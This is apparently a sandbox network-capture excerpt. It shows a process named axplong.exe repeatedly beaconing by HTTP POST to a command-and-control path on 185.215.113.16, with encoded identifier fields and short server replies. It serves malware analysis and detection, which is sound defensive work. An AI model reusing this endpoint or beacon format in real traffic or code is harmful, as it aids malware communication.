                  Sep 26, 2024 19:52:07.586081982 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:07.586807013 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:07.814698935 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.5 | 49716 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:07.937638998 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:08.689390898 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:08.704065084 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:08.930530071 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.5 | 49717 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:09.047137022 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:09.737123013 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:09.737988949 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:09.961215019 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.5 | 49718 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:10.084666014 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:10.794328928 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:10.798983097 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:11.048597097 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  7  192.168.2.5  49719  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:11.168142080 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:12.012074947 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:12.013063908 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:12.236385107 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  8  192.168.2.5  49720  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:12.357697010 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:13.058492899 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:13.059215069 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:13.304394960 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  9  192.168.2.5  49721  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:13.417876005 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:14.153135061 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:14.153961897 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:14.382499933 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  10  192.168.2.5  49722  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:14.498296976 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:15.349714994 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:15.350593090 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:15.579698086 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  11  192.168.2.5  49723  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:15.700742960 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:16.506740093 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:16.507663965 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:16.778635979 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  12  192.168.2.5  49724  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:16.886677980 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:17.633979082 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:17.640093088 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:17.883949995 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  13  192.168.2.5  49725  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:17.996773958 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:18.713627100 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:18.714381933 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:18.977169037 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  14  192.168.2.5  49726  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:19.091345072 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:19.815109015 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:19.816308022 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:20.039165974 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  15  192.168.2.5  49727  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:20.153104067 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:20.855324984 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:20.856623888 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:21.084162951 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  16  192.168.2.5  49728  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:21.202054024 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:21.909286976 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:21.910269022 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:22.138643026 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  17  192.168.2.5  49729  185.215.113.16  80  1408  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Sep 26, 2024 19:52:22.346460104 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:23.061089993 CEST  219  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:23.061784029 CEST  310  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:23.288800955 CEST  196  IN  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


